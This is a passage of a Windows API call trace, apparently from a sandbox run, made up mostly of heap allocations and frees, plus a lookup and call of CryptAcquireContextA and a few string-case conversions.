returned 0x24a9b40 [0264.728] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0264.728] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0264.728] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b69e0 | out: hHeap=0x25c0000) returned 1 [0264.728] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0264.728] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0264.728] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0264.728] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9eb8 [0264.728] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0264.728] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0264.728] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0264.728] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0264.728] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0264.728] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0264.728] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0264.728] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0264.728] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0264.728] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9eb8 [0264.728] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0264.729] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0264.729] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0264.729] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0264.729] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0264.729] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0264.729] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa158 [0264.729] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0264.729] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0264.729] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0264.729] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0264.729] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0264.729] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0264.729] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0264.729] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0264.729] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1808 [0264.729] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16e8 [0264.729] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0264.729] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0264.729] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0264.729] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0264.730] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0264.730] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0264.730] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16e8 [0264.730] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0264.730] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1808 [0264.730] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17f8 [0264.730] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0264.730] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0264.730] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0264.730] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0264.730] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0264.730] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17f8 [0264.730] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0264.730] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1808 [0264.730] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1708 [0264.730] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0264.730] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0264.730] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0264.730] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0264.730] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0264.731] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1708 [0264.731] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0264.731] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1808 [0264.731] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0264.731] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0264.731] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0264.731] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0264.731] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0264.731] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0264.731] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0264.731] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0264.731] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1808 [0264.731] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0264.731] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0264.731] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0264.731] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0264.731] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0264.731] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0264.731] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b69e0 [0264.731] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0264.732] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0264.732] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0264.732] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1808 [0264.732] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1868 [0264.732] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0264.732] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0264.732] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0264.732] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0264.732] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0264.732] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0264.732] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1868 [0264.732] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0264.735] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466e10 [0264.735] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x2466e10, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0264.735] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0264.735] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d50 [0264.735] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0264.735] GetProcAddress (hModule=0x74d40000, lpProcName="CryptAcquireContext") returned 0x0 [0264.735] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d50 | out: hHeap=0x25c0000) returned 1 [0264.735] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0264.735] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1868 [0264.735] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x30) returned 0x24b3538 [0264.735] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0264.735] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1808 [0264.735] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0264.736] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x15) returned 0x2466e10 [0264.736] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x2466e10, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0264.736] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0264.736] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d50 [0264.736] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0264.736] GetProcAddress (hModule=0x74d40000, lpProcName="CryptAcquireContextA") returned 0x74d491dd [0264.736] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d50 | out: hHeap=0x25c0000) returned 1 [0264.736] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0264.736] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3538 | out: hHeap=0x25c0000) returned 1 [0264.736] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0264.736] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466e10 [0264.736] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1868 [0264.736] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1808 [0264.736] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0264.736] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18d8 [0264.736] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1438 [0264.736] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0264.736] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0264.737] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0264.737] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0264.737] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0264.737] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0264.737] CryptAcquireContextA (in: phProv=0x8befe0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8befe0*=0xad2c70) returned 1 [0264.738] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0288 [0264.738] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0264.738] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1438 [0264.738] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0264.738] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0264.738] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0264.738] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18d8 [0264.738] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0264.738] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0264.738] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0264.738] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0264.738] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0264.738] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0264.738] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0264.738] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0264.739] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0264.739] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0264.739] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0264.739] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0264.739] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0264.739] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0264.739] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0264.739] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0264.739] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0264.739] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0264.739] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0264.739] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0264.739] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0264.739] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0264.739] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0264.739] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0264.739] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0264.739] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b69e0 | out: hHeap=0x25c0000) returned 1 [0264.740] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0264.740] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0264.740] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0264.740] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0264.740] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0264.740] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0264.740] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0264.740] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0264.740] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0264.740] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0264.740] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0264.740] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0264.740] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0264.740] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0264.740] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0264.740] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0264.740] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0264.740] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0264.740] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0264.740] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0264.741] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0264.741] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0264.741] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0264.741] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0264.741] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0264.741] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0264.741] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0264.741] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0288 | out: hHeap=0x25c0000) returned 1 [0264.741] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0264.741] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0264.741] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0264.741] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0264.741] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0264.741] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0264.741] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0264.741] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0264.741] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0264.741] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0264.742] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0264.742] CharUpperBuffW (in: lpsz="A1300D00639", cchLength=0xb | out: lpsz="A1300D00639") returned 0xb [0264.742] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b69e0 | out: hHeap=0x25c0000) returned 1 [0264.742] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0264.742] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0264.742] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0264.742] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0264.742] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0264.742] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0264.742] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0264.742] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0264.742] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0264.742] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0264.742] CharUpperBuffW (in: lpsz="SSA1300D00639", cchLength=0xd | out: lpsz="SSA1300D00639") returned 0xd [0264.742] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b48 | out: hHeap=0x25c0000) returned 1 [0264.742] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0264.742] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0264.743] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0264.743] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0264.743] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0264.743] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0264.743] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0264.743] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0264.743] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0264.743] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0264.743] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0264.743] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: 